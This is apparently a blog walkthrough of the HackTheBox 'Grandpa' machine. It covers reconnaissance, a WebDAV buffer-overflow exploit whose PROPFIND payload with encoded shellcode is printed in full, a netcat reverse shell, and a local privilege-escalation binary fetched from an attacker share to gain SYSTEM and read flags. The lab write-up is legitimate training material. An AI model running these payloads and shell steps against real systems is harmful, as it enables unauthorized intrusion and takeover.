HackTheBox: Grandpa & Granny

The first step was to run an Nmap scan to discover services running on the machine:

# Nmap 7.80 scan initiated Thu Nov 12 14:33:08 2020 as: nmap -sV -sC -O -p1-2056 -oN scan 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.014s latency).
Not shown: 2055 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Server Date: Thu, 12 Nov 2020 19:36:15 GMT
|_  Server Type: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (91%), Microsoft Windows Server 2008 Enterprise SP2 (91%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP SP3 (89%), Microsoft Windows 2003 SP2 (88%), Microsoft Windows 2000 SP4 (86%), Microsoft Windows XP (86%), Microsoft Windows Server 2003 SP1 - SP2 (85%), Microsoft Windows XP SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 12 14:33:28 2020 -- 1 IP address (1 host up) scanned in 19.20 seconds

 

From the output we can see that IIS 6.0 is running with webdav. I then used searchsploit to search for exploits for IIS 6.0

┌──(root💀kali)-[/home/kali]
└─# searchsploit iis 6.0                                                                                                                                                                                                               1 ⨯
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure                                                                                                                         | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow                                                                                                                                  | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service                                                                                                                                    | windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service                                                                                                                                             | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)                                                                                                                   | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                                                                                                                                 | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                                                                                                                                              | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                                                                                                                                              | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                                                                                                                                          | windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                                                                                                                                            | windows/remote/8765.php
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities                                                                                                                                                 | windows/remote/19033.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

After some trials with some exploits searchsploit discovered, I was able to use the one based on the ScStoragePathFromUrl remote buffer overflow found HERE.

I created a netcat listener on port 2600, downloaded the python script and ran it with the necessary arguments.

root@kali:/home/kali/Documents/grandpa# python test.py 10.10.10.14 80 10.10.14.15 2600
Traceback (most recent call last):
  File "test.py", line 124, in <module>
    sock.connect((targetip,targetport))
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 110] Connection timed out
root@kali:/home/kali/Documents/grandpa# python test.py 10.10.10.14 80 10.10.14.15 2600
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
If: <http://localhost/aaaaaaa₩ᄑᄄ￧ᄀᆪ￧ンᄀ￧トᄈ₩ᄂᄊ¦ンᄇ￧ᄄᄍ¦ᆳᄋ¦ᄑᄚ￧ユモ￧ᄅマ¦ᄀᄄ¥ルᆪ₩ᄉヤ₩ᄀナ ̄ᆬモ¥チᆲ¥ユᄃ₩ンᆪ ̄ヘᄂ¦リᄚ￧ᄀナ₩ᆬメ¥ミᄆ¦ᄆリ₩ᄅム￧ノチ¦ネᄆ￧タᄉ¥ᄀミ ̄ルᄂ₩ᄆヌ ̄ヤᄍ¥ムᆰ¥タᄡ¥ムテ￧ンメ¥チᄀ ̄ネᄇ₩ᄉヒ₩ᄚᄡ ̄ノヌ₩ノチ ̄ンヘ¥ナᄀ¥ᄀᄁ¦ンᄈ¥ノミ ̄ルᄚ￧ユト₩ᄀᆰ ̄ヘᄡ¦ᄍハ￧ᄀᆱ¦ᆬᄊ¦ᄍᄈ¦ᄆᆰ¥ンᄎ₩ᄑᄆ¥ᄀハ ̄ネᄚ ̄ンᆴ¦ᆳノ¥ノヘ¦ᄀᆪ₩ᄑフ￧ユヨ￧ユᄉ₩ルᆵ￧ルᄄ¦ムヘ¥チᄚ￧ᄄᄊ₩ノヒ₩ユラ￧ユミ₩ᄅᄇ￧ᄅᆱ￧ンᄁ￧ルリ₩ノネ₩ヤᄆ ̄チヤ₩ᄆᄍ¥チハ¥ムᄁ¥タᄈ ̄ユᄋ₩ᄅᄋ¦ナト ̄フᄡ₩ムᄊ¦ᄉニ¥ルヤ¦ンᆲ₩ユテ￧リᄇ￧ノᄌ¥ンᄅ¦フᄌ₩ノᄇ¥ᄄᄚ¥ᄂᄌ¥ムネ￈ツ￈ツ£ヒタ₩ᅠテ₩ᄆト¥ノヨ¦ᆲᄋ₩ᄆᆳ¦ᄑリ¥ᄀレ￧ᆬミ¦ᆬᆰ¥ᄀマ¦ᄅメ¦ナミ₩ルヘ£マタ₩ᅠテ¦ᅠᄡ₩ヤᄆ₩ᄑテ₩ᄍᆭ￧ムチ¦ヘᆲ£マタ₩ᅠテ¥ヘテ₩ᄅチ￧チメ ̄フᄚ¥ᄀᆭ¦ノフ￧チヒ₩ヘニ¥ナᄈ￧ᆬチ￧ᄅミ¦ᄅᆲ> (Not <locktoken:write1>) <http://localhost/bbbbbbb￧ᆬネ₩ナᄉ¦ᄑテ₩ᄑᄃ₩ᆳᆵ¦ᄀナ ̄ルニ₩ンᄉ¦ミᄈ ̄ᄀᄆ¥ンᆬ¥ᄅᄁ¥ミᄉ¥ルᄀ₩ᆬメ₩ᄅモ¥ナラ ̄ᄀホ¥ᆬネ₩ヘユ¦ᆬᄆ¦ヘᄂ₩ムᄇ ̄ムᄄ¦ンリ￧ナᄍ ̄ヘᆱ₩ᆳユ₩ᄉネ¥チマ￧ᄅニ ̄ムᄆ₩ᄑヤ￧ムテ¥ᆬヨ₩ᄑᆵ￧ヘチ ̄ムラ₩ナᄄ￧ᄅᄇ ̄ンナ¦ᄉノ¥ンホ¥ムネ¦ᄚᄌ ̄ルᄎ ̄ユᄇ₩ノᆭ₩ᄍテ¦ᄀᆳ ̄ユネ₩ナᄋ¦ᄉレ₩ナᄡ¦トᄈ¦ヘᆬ¥ノᄇ₩ᄉᄅ ̄ルᄆ¦ᄍᄂ₩ᄌᄍ₩ヘモ₩ᆳᄂ¥ナニ¦ᄐᄚ￧ᄀᆵ￧ノモ₩ンミ¦ユモ￧ᄅᆪ￧トᄍ¦ᄑモ¦ムヨ₩ᄐᄊ￧ヘᄍ₩ᄀᄋ￧ᄅヨ₩ナハ ̄ᆬナ ̄リᄍ₩ᄚᄍ¦ヤᄆ ̄ムᄇ¥ヘᆬ¥ᄀハ¦ムホ￧ᄅト₩ᄚᄉ¥ᄅヨ₩ノチ₩ᄍᄇ₩リᄆ¥ᆬル¥ミᄈ ̄ナツ¥ᄀᆬ¥ᆬチ￧ナミ ̄タᄊ¥ンᄋ¦ムラ¥ヘᄀ£マタ₩ᅠテ₩ᄍマ₩ᅠタ₩ᄍマ₩ᅠタ¦ノヌ￧ルᆰ£マタ₩ᅠテ¦ノラ¦ᄑᄡ¥ᆬヌ¥ネᄡ¦ᆳᆭ¦ᆳツ￧ムᄂ￧ᄀᆵ₩ツツ₩ᅠチ¥トᄉ￧ノᄎ￧ムᄎ¦ᄉヌ¦ムル¥ンラ→トモ₩ᅠタ ̄ナᄊ₩ᄍᆵ¬モᆪ₩ᅠチ£ムᅠ₩ᅠテ￧﾿ᄒ￯﾿﾿￯﾿﾿£マタ₩ᅠテ￑ᆴ₩ᅠテ￧ナᆴ￧ムᄚ£ミᄡ₩ᅠテ¬ᄃᄃ₩ᅠチ←ホム₩ᅠタ ̄ᄂᄆ₩ルᆴ¦ᆬユ ̄チメ¥ムᆱ￧ルᆱ￧ノハ￧ᆬᄀ£ミワ₩ᅠテ₩ᄌナ₩ᅠタ￧ワᄇ￧ᆬᄄ¦ᄉᄅ ̄ルᆲ¦ムᄄ¦ᄉᄚ│ノニ₩ᅠタ¦ᄀᄋ ̄ノモ£ᄊᆰ₩ᅠツ₩ᄑᆰ¦フᄉ£マᄌ₩ᅠテ¬ᄃᄃ₩ᅠチVVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJINDKSKPKPTKKQTKT0D8TKQ8RTJKKX1OTKIGJSW4R0KOIBJHKCKOKOKOF0V04PF0M0A>



┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600                                                                                                                                                                                                                      1 ⨯
listening on [any] 2600 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.14] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>

As you can see from the output, the shell was successfully captured by the netcat listener. I then moved onto privilege escalation. I ran systeminfo to get some details of the Grandpa machine. From the output I was able to determine that it was running Server 2003 with only 1 hotfix. Because of this I decided to try using the MS08-066 exploit as I had luck with it in the past. I downloaded the exploit from GITHUB and copied it to the machine using SBM.

C:\wmpub>copy \\10.10.14.18\testshare\ms08066.exe
copy \\10.10.14.18\testshare\ms08066.exe
        1 file(s) copied.

I then ran the exploit.

C:\wmpub>ms08066.exe
ms08066.exe

 MS08-0xx Windows Kernel Ancillary Function Driver Local Privilege Escalation Vulnerability Exploit 

         Create by SoBeIt. 

Kernel is \WINDOWS\system32\ntkrnlpa.exe
Kernel base address: 80800000
Major Version:5 Minor Version:2
Load Base:410000
HalDispatchTable Offset:8088e078
NtQueryIntervalProfile function entry address:8088e07c
Exploit finished.

C:\wmpub>cd c:\
cd c:\

C:\>cd documents and settings
cd documents and settings

C:\Documents and Settings>cd Harry
cd Harry

C:\Documents and Settings\Harry>cd Desktop
cd Desktop

C:\Documents and Settings\Harry\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Harry\Desktop

04/12/2017  04:32 PM    <DIR>          .
04/12/2017  04:32 PM    <DIR>          ..
04/12/2017  04:32 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,123,960,320 bytes free

C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
[REDACTED]

C:\Documents and Settings\Harry\Desktop>cd ..
cd ..

C:\Documents and Settings\Harry>cd ..
cd ..

C:\Documents and Settings>cd Administrator
cd Administrator

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
[REDACTED]

As you can see from the output, I was able to successfully browse to the Administrator and Harry folders as the SYSTEM user and capture both flags.

Leave a Reply

Your email address will not be published. Required fields are marked *